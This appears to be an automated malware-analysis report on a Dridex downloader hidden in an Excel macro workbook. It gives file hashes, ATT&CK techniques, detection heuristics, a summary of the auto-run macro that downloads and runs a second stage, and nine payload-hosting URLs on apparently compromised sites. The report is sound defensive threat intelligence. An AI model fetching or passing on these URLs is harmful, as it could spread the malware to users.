Dridex — Office (OOXML) / .XLSM malware analysis

Static analysis result for SHA-256 dfe4a58c8eaa737b…

MALICIOUS

Office (OOXML) / .XLSM

625.0 KB Created: 2021-05-10 16:23:15 UTC Authoring application: Microsoft Excel 15.0300
MD5: 41a7b85ab2340d9cffcea9d4fed5886d SHA-1: af7a46c0034977be519a3ebdd656675dd02c8c94 SHA-256: dfe4a58c8eaa737bbd257cc8201220d5d59e73ffc4c21329e0e88cc1d04b80fe
248 Risk Score

Malware Insights

Dridex · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1059.003 Windows Command Shell T1218.011 Rundll32 T1105 Ingress Tool Transfer

The sample is an XLSM file containing a Workbook_Open macro that uses CreateObject to instantiate Wscript.Shell and MSXML2.XMLHTTP. This macro is designed to download and execute a second-stage payload from one of the embedded URLs. The ClamAV detection name 'Xls.Downloader.DridexOffice0521-9863759-0' strongly suggests a Dridex family attribution.

Heuristics 8

  • ClamAV: Xls.Downloader.DridexOffice0521-9863759-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Downloader.DridexOffice0521-9863759-0
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • Visible LOLBin command execution instruction high SE_LOLBIN_RUN_COMMAND
    Document contains instructions or visible command text involving Windows script/execution tools such as PowerShell, mshta, cmd, rundll32, or regsvr32
  • Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • VBA project inside OOXML medium OOXML_VBA
    Document contains vbaProject.bin — VBA macros present
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL https://s3solutions.ae/d6dCRQeJGD00Os.php
    • https://aula-virtual.istpiberoamericano.edu.pe/grade/import/direct/lang/en/g1yIdqk0u.php
    • https://toptaxi24.com/toptest/toptaxi/homedir/mail/cur/JqV4fB12DW8cw.php
    • https://marianayalfonso.com/wp-content/plugins/mpc-massive/panel/extra/cdJv1ZjMU3JsM.php
    • https://suubis.com/wp-content/plugins/elementskit-lite/modules/controls/eNIIx0qt3Zbnfp.php
    • https://tseboprocurement.co.za/inc/phpmailer/test_script/images/_notes/E3KYpyHWeU.php
    • https://sellobsoleteinventories.com/images/favicon/0mJUsyWM8dOk6.php
    • https://consultoriaemimpermeabilizacao.com/wp-includes/js/tinymce/plugins/charmap/SUn668N8oHZI.php
    • https://kronocreativeagency.com/wp-content/themes/twentynineteen/template-parts/content/O9chyPRvQDmYt.php

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas
3afc589db3d5827e763d187442d374ae6ef84e3deeac53a72dbbb5ee99a8fdf2		 vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 430333 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved macro source contains an auto-exec entry point and execution/download terms.
vbaProject_00.bin
bdbe12ea4bd13a379c08e0c01b9b575788b2418219a6cd3b96ddda3d4c9f65e8		 vba-project OOXML VBA project: xl/vbaProject.bin 892928 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved macro source contains an auto-exec entry point and execution/download terms.

Open this report in the interactive analyzer, or submit your own file for analysis.